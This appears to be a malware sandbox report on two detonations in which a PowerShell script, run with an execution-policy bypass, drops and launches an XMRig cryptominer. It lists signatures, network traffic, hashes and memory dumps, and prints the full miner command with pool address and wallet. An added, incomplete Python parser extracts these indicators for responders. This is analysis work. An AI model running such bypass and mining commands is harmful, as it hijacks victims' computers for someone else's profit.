memory/3600-50-0x0000020E59BC0000-0x0000020E59BE0000-memory.dmp
memory/3012-52-0x00007FFC3FCC0000-0x00007FFC40782000-memory.dmp
memory/3600-51-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3012-53-0x00007FFC3FCC3000-0x00007FFC3FCC5000-memory.dmp
memory/3600-54-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-57-0x0000020E59BC0000-0x0000020E59BE0000-memory.dmp
memory/3600-56-0x0000020DC7000000-0x0000020DC7020000-memory.dmp
memory/3600-55-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-58-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-59-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-60-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-61-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-62-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-63-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-64-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-65-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-66-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-67-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-68-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-69-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-70-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-71-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-72-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-73-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-74-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-75-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-76-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-77-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-78-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-79-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-80-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-81-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-82-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-83-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-84-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-85-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-86-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-87-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-88-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-89-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-90-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-91-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-92-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-93-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-94-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-95-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-96-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-97-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-98-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-99-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-100-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-101-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-102-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-103-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-104-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-105-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-106-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-107-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-108-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-109-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-110-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-111-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-112-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-113-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-114-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-115-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-116-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
Analysis: behavioral7
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 16:32
Platform
win10v2004-20240508-en
Max time kernel
1792s
Max time network
1779s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1868 wrote to memory of 2092 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 1868 wrote to memory of 2092 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 136.71.105.51.in-addr.arpa | udp |
Files
memory/1868-0-0x00007FFED0E03000-0x00007FFED0E05000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4m2p3uh3.yit.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1868-1-0x000001DDAD9F0000-0x000001DDADA12000-memory.dmp
memory/1868-11-0x00007FFED0E00000-0x00007FFED18C1000-memory.dmp
memory/1868-12-0x00007FFED0E00000-0x00007FFED18C1000-memory.dmp
memory/1868-14-0x00007FFED0E00000-0x00007FFED18C1000-memory.dmp
memory/1868-15-0x000001DDADF10000-0x000001DDADF22000-memory.dmp
memory/1868-16-0x000001DDADB20000-0x000001DDADB2A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2092-47-0x0000021C96190000-0x0000021C961B0000-memory.dmp
memory/2092-48-0x0000021C961E0000-0x0000021C96200000-memory.dmp
memory/2092-49-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-52-0x0000021C97AE0000-0x0000021C97B00000-memory.dmp
memory/2092-51-0x0000021C97AC0000-0x0000021C97AE0000-memory.dmp
memory/1868-50-0x00007FFED0E00000-0x00007FFED18C1000-memory.dmp
memory/1868-54-0x00007FFED0E03000-0x00007FFED0E05000-memory.dmp
memory/2092-53-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/1868-55-0x00007FFED0E00000-0x00007FFED18C1000-memory.dmp
memory/2092-56-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-57-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-59-0x0000021C97AE0000-0x0000021C97B00000-memory.dmp
memory/2092-58-0x0000021C97AC0000-0x0000021C97AE0000-memory.dmp
memory/2092-60-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-61-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-62-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-63-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-64-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-65-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-66-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-67-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-68-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-69-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-70-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-71-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-72-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-73-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-74-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-75-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-76-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-77-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-78-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-79-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-80-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-81-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-82-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-83-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-84-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-85-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-86-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-87-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-88-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-89-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-90-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-91-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-92-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-93-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-94-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-95-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-96-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-97-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-98-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-99-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-100-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-101-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-102-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-103-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-104-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-105-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-106-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-107-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-108-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-109-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-110-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-111-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-112-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-113-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-114-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-115-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-116-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-117-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-118-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
Analysis: behavioral12
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 16:36
Platform
win11-20240426-en
Max time kernel
1798s
Max time network
1764s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
(64 matches of this signature in this run; the report records no description, indicator, process or target for any of them)
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4140 wrote to memory of 4032 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4140 wrote to memory of 4032 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 52.111.229.19:443 | | tcp |
Files
memory/4140-0-0x00007FFA43393000-0x00007FFA43395000-memory.dmp
memory/4140-1-0x000002D79E520000-0x000002D79E542000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5fzvcclf.01y.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4140-10-0x00007FFA43390000-0x00007FFA43E52000-memory.dmp
memory/4140-11-0x00007FFA43390000-0x00007FFA43E52000-memory.dmp
memory/4140-12-0x00007FFA43390000-0x00007FFA43E52000-memory.dmp
memory/4140-14-0x000002D79E790000-0x000002D79E7A2000-memory.dmp
memory/4140-15-0x000002D79E500000-0x000002D79E50A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4032-46-0x0000016CF9AC0000-0x0000016CF9AE0000-memory.dmp
memory/4032-48-0x0000016CF9B10000-0x0000016CF9B30000-memory.dmp
memory/4140-47-0x00007FFA43390000-0x00007FFA43E52000-memory.dmp
memory/4140-50-0x00007FFA43390000-0x00007FFA43E52000-memory.dmp
memory/4140-49-0x00007FFA43393000-0x00007FFA43395000-memory.dmp
memory/4032-51-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-54-0x0000016CFB2E0000-0x0000016CFB300000-memory.dmp
memory/4032-53-0x0000016CFB300000-0x0000016CFB320000-memory.dmp
memory/4032-52-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-55-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-56-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-57-0x0000016CFB300000-0x0000016CFB320000-memory.dmp
memory/4032-58-0x0000016CFB2E0000-0x0000016CFB300000-memory.dmp
memory/4032-59-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-60-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-61-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-62-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-63-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-64-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-65-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-66-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-67-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-68-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-69-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-70-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-71-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-72-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-73-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-74-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-75-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-76-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-77-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-78-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-79-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-80-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-81-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-82-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-83-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-84-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-85-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-86-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-87-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-88-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-89-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-90-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-91-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-92-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-93-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-94-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-95-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-96-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-97-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-98-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-99-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-100-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-101-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-102-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-103-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-104-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-105-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-106-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-107-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-108-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-109-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-110-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-111-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-112-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-113-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-114-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-115-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-116-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-117-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
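The xmrig.exe command line recorded under Processes for this run carries every IOC a responder needs (pool, protocol, coin, wallet, worker) and also explains two of the signatures above: `-a rx` selects RandomX, whose huge-page setup is what requests SeLockMemoryPrivilege, and `stratum+ssl://rx.unmineable.com:443` puts pool traffic on the HTTPS port where a port-based filter will not see it. The parser below is an added example written for this page, not code from the report or from XMRig. It knows only the four options that appear here plus their long `--algo/--url/--user/--pass` spellings, and the `COIN:address.worker` split is an assumption about unMineable's user-name convention rather than something the report states.

```python
"""Pull pool, wallet and worker IOCs out of an XMRig-style command line.

Added example for this report; not code from the report or from XMRig.
The sample command line is copied from the behavioral12 Processes section.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Copied from the behavioral12 Processes section of the report.
SAMPLE_CMDLINE = (
    r'"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx '
    r'-o stratum+ssl://rx.unmineable.com:443 '
    r'-u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF'
    r'.unmineable_worker_vilqtiac -p x'
)

# Only the options seen on this page, short and long spellings (assumption: nothing else is needed here).
OPTION_NAMES = {"-a": "algo", "--algo": "algo", "-o": "url", "--url": "url",
                "-u": "user", "--user": "user", "-p": "pass", "--pass": "pass"}

# Monero mainnet address: 95 base58 characters, first one 4 (standard) or 8 (subaddress).
XMR_ADDRESS_RE = re.compile(r"^[48][1-9A-HJ-NP-Za-km-z]{94}$")
POOL_URL_RE = re.compile(r"^(?:(?P<scheme>[a-z+]+)://)?(?P<host>[^:/]+)(?::(?P<port>\d+))?")


@dataclass
class MinerIOCs:
    image: str
    algo: Optional[str] = None
    scheme: Optional[str] = None
    pool_host: Optional[str] = None
    pool_port: Optional[int] = None
    coin: Optional[str] = None       # unMineable-style "COIN:" prefix, when present (assumption)
    wallet: Optional[str] = None
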